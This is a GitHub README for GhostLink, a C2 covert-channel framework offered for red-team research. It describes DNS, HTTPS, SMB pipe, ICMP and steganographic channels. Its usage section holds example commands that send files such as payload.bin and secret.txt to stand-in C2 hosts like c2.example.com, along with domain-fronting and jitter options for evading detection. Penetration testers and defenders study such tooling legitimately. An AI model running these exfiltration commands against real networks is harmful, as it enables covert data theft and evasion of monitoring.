Skip to content

README.md

Latest commit

 

History

History
183 lines (138 loc) · 5.42 KB

README.md

File metadata and controls

183 lines (138 loc) · 5.42 KB

GhostLink

Covert C2 Communication and Channel Research Framework

GhostLink is a research framework for studying covert communication channels used in red team operations. It implements various C2 channel techniques including DNS tunneling, HTTPS beaconing, named pipe communication, and steganographic data exfiltration.

Disclaimer: This tool is intended for authorized security research, penetration testing, and educational purposes only. Use of this software against systems without explicit authorization is illegal and unethical. The authors are not responsible for any misuse.

Features

  • DNS Tunneling — Encode data in DNS queries/responses (TXT, CNAME, A records, CNAME chaining)
  • HTTPS Beaconing — Malleable C2 profiles, domain fronting, configurable jitter
  • Named Pipe Channel — Local/remote SMB pipe communication with impersonation and SMB3 encryption
  • ICMP Covert Channel — Data hidden in ICMP echo payloads with fragmentation
  • Steganographic Encoding — LSB image embedding (BMP) with scatter mode
  • Encryption — AES-256-GCM and ChaCha20-Poly1305
  • Channel Manager — Multi-channel failover, round-robin, priority-based selection
  • Traffic Analysis Resistance — Timing jitter, payload padding, dummy traffic generation

Architecture

+---------------------------------------------------+
|                   CLI / API                        |
+---------------------------------------------------+
|                Channel Manager                     |
|   (Failover, Round-Robin, Random, Least-Latency)  |
+---------------------------------------------------+
|     Protocol Codec        |    Encryption Layer    |
|  (Framing, Compression)   | (AES-GCM, ChaCha20)   |
+---------------------------------------------------+
|  DNS    | HTTPS  | Named  | ICMP   | Stego        |
|  Tunnel | Beacon | Pipe   | Covert | Encoding     |
+---------------------------------------------------+
|              OS Network / IPC Layer                |
+---------------------------------------------------+

Build

Requirements

  • CMake 3.16+
  • C++17 compiler (MSVC 2019+, GCC 9+, Clang 10+)
  • Windows SDK (for CNG crypto and WinHTTP)

Build Instructions

mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release

Run Tests

cd build
ctest --output-on-failure

Usage

Generate Encryption Keys

ghostlink keygen

DNS Tunnel

# Start listener
ghostlink listen -t dns -d data.example.com --verbose

# Connect and send data
ghostlink connect -t dns -h 8.8.8.8 -d c2.example.com -i payload.bin

HTTPS Beacon

# Connect with jitter
ghostlink connect -t https -h c2server.com -p 443 --sleep 30000 --jitter 40

# With domain fronting
ghostlink connect -t https -h cdn.legit.com -p 443 --profile fronting

Named Pipe

# Local pipe listener
ghostlink listen -t pipe -n ghostlink_c2

# Remote pipe via SMB
ghostlink connect -t pipe -h 192.168.1.100 -n ghostlink_c2

ICMP Covert Channel

ghostlink connect -t icmp -h 10.0.0.1 -i secret.txt

Steganographic Encoding

ghostlink encode -i secret.txt -o cover.bmp --type stego

Bidirectional Tunnel

ghostlink tunnel -t dns -h resolver.example.com -d tunnel.example.com

Self-Test

ghostlink test --verbose

Project Structure

ghostlink/
├── src/
│   ├── core/
│   │   ├── channel.h            # Abstract channel interface
│   │   ├── channel_manager.h    # Multi-channel orchestration
│   │   ├── channel_manager.cpp
│   │   ├── crypto.h             # Encryption layer
│   │   ├── crypto.cpp
│   │   ├── protocol.h           # Wire protocol
│   │   └── protocol.cpp
│   ├── channels/
│   │   ├── dns_tunnel.h/.cpp    # DNS tunneling
│   │   ├── https_beacon.h/.cpp  # HTTPS beaconing
│   │   ├── named_pipe.h/.cpp    # Named pipe channel
│   │   └── icmp_channel.h/.cpp  # ICMP covert channel
│   ├── encoding/
│   │   ├── base32.h/.cpp        # Base32 encoding
│   │   └── steganography.h/.cpp # LSB image encoding
│   ├── utils/
│   │   └── jitter.h/.cpp        # Timing jitter utilities
│   └── main.cpp                 # CLI entry point
├── tests/
│   ├── test_crypto.cpp          # Crypto unit tests
│   └── test_dns_encoding.cpp    # DNS encoding tests
├── docs/
│   ├── channel-architecture.md
│   └── covert-channels-overview.md
├── CMakeLists.txt
├── LICENSE
└── README.md

Contact

Support

Help keep BypassCore open-source and independent.

Network Address
Polygon 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Ethereum 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
BSC 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Arbitrum 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Optimism 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a
Avalanche 0xd0f38b51496bee61ea5e9e56e2c414b607ab011a

USDT / USDC / ETH / BNB accepted on all networks.

License

MIT License - see LICENSE for details.